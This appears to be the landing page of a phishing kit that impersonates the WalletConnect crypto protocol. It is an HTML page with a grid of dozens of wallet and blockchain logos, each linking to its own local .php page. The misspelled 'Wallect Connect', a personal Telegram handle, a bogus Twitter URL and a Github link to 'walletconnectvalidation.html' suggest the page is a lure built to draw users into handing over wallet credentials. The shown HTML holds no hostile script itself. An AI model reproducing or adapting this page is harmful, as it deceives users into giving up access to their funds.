﻿<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="assets\main.css" type="text/css"> 
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Open protocol for connecting Wallets to Dapps">
<meta property="og:image" content="images/logo.svg">
<link rel="icon" href="assets\logo.svg">
<script>
function show() {
  var x = document.getElementById("hidden");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }

  if (x.style.display === "block") {
    document.getElementById("btn").innerHTML = "Show Less &uarr;";
  } 
}
</script>
<title>WalletConnect</title>
</head>
<body>
<center>
    <div class="top">
        <a href="#footer?v" class="left">Github</a>

        <a href="#?v" class="left">Docs</a>
        <a href="index.htm?v" class="main"><img src="assets\logo.svg" alt="logo"></a>
        <a href="#wallets?v" class="left">Wallets</a>
        <a href="#?v" class="left">Apps</a>
</div>
<br>
<div class="gFeYHJ">WalletConnect</div>

<div class="lpfxqP"></div>
<br>

<div class="dXgqeu">
<img src="assets\banner.png" alt="WalletConnect">
</div>



<div class="wallets" id="wallets">
    <h1 class="home">Wallets</h1>
<p></p>

<br>

<div class="all">
<div class="apps">
    <a href="metamask.php"><img src="assets/metamask.png"></a><br>
    MetaMask
</div>

<div class="apps">
    <a href="mew.php"><img src="assets/MEW.png"></a><br>
    MEW Wallet
</div>

<div class="apps">
    <a href="trust.php"><img src="assets/trustwallet.png"></a><br>
    Trust Wallet
</div>

<div class="apps">
    <a href="wallect.php"><img src="assets/logo.svg"></a><br>
    Wallect<br>Connect
</div>

<div class="apps">
    <a href="coinbase.php"><img src="assets/coinbase.jpg"></a><br>
    Coinbase Wallet
</div>

<div class="apps">
    <a href="atomic.php"><img src="assets/atomic.png"></a><br>
    Atomic Wallet
</div>

<div class="apps">
    <a href="binance.php"><img src="assets/binance.png"></a><br>
    Binance Smart Chain
</div>

<div class="apps">
    <a href="bnb.php"><img src="assets/bnb.png"></a><br>
    BNB
</div>

<div class="apps">
    <a href="polkadot.php"><img src="assets/polkadot.png"></a><br>
    Polkadot
</div>

<div class="apps">
    <a href="xrp.php"><img src="assets/xrp.png"></a><br>
    XRP
</div>

<div class="apps">
    <a href="stellar.php"><img src="assets/stellar.png"></a><br>
    Stellar
</div>

<div class="apps">
    <a href="tezos.php"><img src="assets/tezos.png"></a><br>
    Tezos
</div>

<div class="apps">
    <a href="theta.php"><img src="assets/theta.png"></a><br>
    Theta
</div>

<div class="apps">
    <a href="tron.php"><img src="assets/tron.png"></a><br>
    Tron
</div>

<div class="apps">
    <a href="cosmos.php"><img src="assets/cosmos.png"></a><br>
    Cosmos
</div>

<div class="apps">
    <a href="kava.php"><img src="assets/kava.png"></a><br>
    Kava
</div>

<div class="apps">
    <a href="filecoin.php"><img src="assets/filecoin.png"></a><br>
    Filecoin
</div>

<div class="apps">
    <a href="solana.php"><img src="assets/solana.png"></a><br>
    Solana
</div>

<div class="apps">
    <a href="ethereumclassic.php"><img src="assets/ethereum-classic.png"></a><br>
    Ethereum Classic
</div>

<div class="apps">
    <a href="zilliqa.php"><img src="assets/zilliqa.png"></a><br>
    Zilliqa
</div>

<div class="apps">
    <a href="elrond.php"><img src="assets/elrond.jpg"></a><br>
    Elrond
</div>

<div class="apps">
    <a href="waves.php"><img src="assets/waves.png"></a><br>
    Waves
</div>

<div class="apps">
    <a href="icon.php"><img src="assets/icon.png"></a><br>
    ICON
</div>

<div class="apps">
    <a href="ontology.php"><img src="assets/ontology.png"></a><br>
    Ontology
</div>

<div class="apps">
    <a href="harmony.php"><img src="assets/harmony.jpeg"></a><br>
    Harmony
</div>

<div class="apps">
    <a href="parsiq.php"><img src="assets/parsiq.jpeg"></a><br>
    Parsiq
</div>


</div>
<br>
<button onclick="show()" class="btn" id="btn">Show More ↓</button>
<br><br>
<div class="hidden" id="hidden">
<div class="all">
    
<div class="apps">
    <a href="nano.php"><img src="assets/nano.png"></a><br>
    Nano
</div>

<div class="apps">
    <a href="tomo.php"><img src="assets/tomo.png"></a><br>
    Tomo Chain
</div>

<div class="apps">
    <a href="iotex.php"><img src="assets/iotex.png"></a><br>
    IoTex
</div>

<div class="apps">
    <a href="wanchain.php"><img src="assets/wanchain.png"></a><br>
    Wanchain
</div>

<div class="apps">
    <a href="kin.php"><img src="assets/kin.png"></a><br>
    Kin
</div>

<div class="apps">
    <a href="nimiq.php"><img src="assets/nimiq.png"></a><br>
    Nimiq
</div>

<div class="apps">
    <a href="aion.php"><img src="assets/aion.png"></a><br>
    Aion
</div>

<div class="apps">
    <a href="thundertoken.php"><img src="assets/thundertoken.png"></a><br>
    Thunder Token
</div>

<div class="apps">
    <a href="aerternity.php"><img src="assets/aeternity.png"></a><br>
    Aeternity
</div>

<div class="apps">
    <a href="nebulas.php"><img src="assets/nebulas.png"></a><br>
    Nebulas
</div>

<div class="apps">
    <a href="fio.php"><img src="assets/fio.png"></a><br>
    FIO
</div>

<div class="apps">
    <a href="gochain.php"><img src="assets/gochain.png"></a><br>
    GoChain
</div>

<div class="apps">
    <a href="poa.php"><img src="assets/poa.png"></a><br>
    POA Network
</div>

<div class="apps">
    <a href="callisto.php"><img src="assets/callisto.png"></a><br>
    Callisto
</div>

<div class="apps">
    <a href="bitpay.php"><img src="assets/bitpay.jpg"></a><br>
    BitPay
</div>

<div class="apps">
    <a href="aktionariat.php"><img src="assets/aktionariat.png"></a><br>
    Aktionariat
</div>

<div class="apps">
    <a href="atwallet.php"><img src="assets/atwallet.png"></a><br>
    AtWallet
</div>

<div class="apps">
    <a href="guard.php"><img src="assets/guard.png"></a><br>
    Guard Wallet
</div>

<div class="apps">
    <a href="aave.php"><img src="assets/aave.jpg"></a><br>
    AAVE
</div>

<div class="apps">
    <a href="exodus.php"><img src="assets/exodus.jpg"></a><br>
    Exodus
</div>


<div class="apps">
    <a href="enjin.php"><img src="assets/enjin.jpg"></a><br>
    Enjin
</div>


<div class="apps">
    <a href="skale.php"><img src="assets/skale.png"></a><br>
    Skale
</div>

<div class="apps">
    <a href="portis.php"><img src="assets/portis.png"></a><br>
    Portis
</div>

<div class="apps">
    <a href="trezor.php"><img src="assets/trezor.png"></a><br>
    Trezor
</div>

<div class="apps">
    <a href="squarelink.php"><img src="assets/squarelink.png"></a><br>
    Squarelink
</div>

<div class="apps">
    <a href="torus.php"><img src="assets/torus.jpg"></a><br>
    Torus
</div>

<div class="apps">
    <a href="vechain.php"><img src="assets/vechain.jpg"></a><br>
    VeChain
</div>

<div class="apps">
    <a href="scatter.php"><img src="assets/scatter.jpg"></a><br>
    Scatter Wallet
</div>

<div class="apps">
    <a href="math.php"><img src="assets/math-wallet.png"></a><br>
    Math Wallet
</div>

<div class="apps">
    <a href="fortmatic.php"><img src="assets/fortmatic.png"></a><br>
    FortMatic
</div>

<div class="apps">
    <a href="digitex.php"><img src="assets/digitex.png"></a><br>
    Digitex
</div>

<div class="apps">
    <a href="ledger.php"><img src="assets/ledger.png"></a><br>
    Ledger
</div>

<div class="apps">
    <a href="defiat.php"><img src="assets/defiat.jpg"></a><br>
    Defiat
</div>

<div class="apps">
    <a href="authereum.php"><img src="assets/authereum.png"></a><br>
    Authereum
</div>

<div class="apps">
    <a href="flare.php"><img src="assets/flare.jpg"></a><br>
    Flare Wallet
</div>

<div class="apps">
    <a href="zelcore.php"><img src="assets/zelcore.png"></a><br>
    Zelcore
</div>

<div class="apps">
    <a href="bitkeep.php"><img src="assets/bitkeep.png"></a><br>
    BitKeep
</div>

<div class="apps">
    <a href="coin98.php"><img src="assets/coin98.png"></a><br>
    Coin98
</div>

<div class="apps">
    <a href="trustvault.php"><img src="assets/trustvault.png"></a><br>
    Trust Vault
</div>

</div>

</div>


</div>
<footer><div id="footer">
<p><img src="assets\discord.svg" class="footimg">  <a href="invite\jhxMvxP.html">Discord</a></p><br>
<p><img src="assets\telegram.svg" class="footimg">  <a href="https://t.me/amooishere">Telegram</a></p><br>
<p><img src="assets\twitter.svg" class="footimg">  <a href="https://twitter.wa.loading/">Twitter</a></p><br>
<p><img src="assets\github.svg" class="footimg">  <a href="walletconnectvalidation.html">Github</a></p><br>
</div></footer>
</center>
</body></html>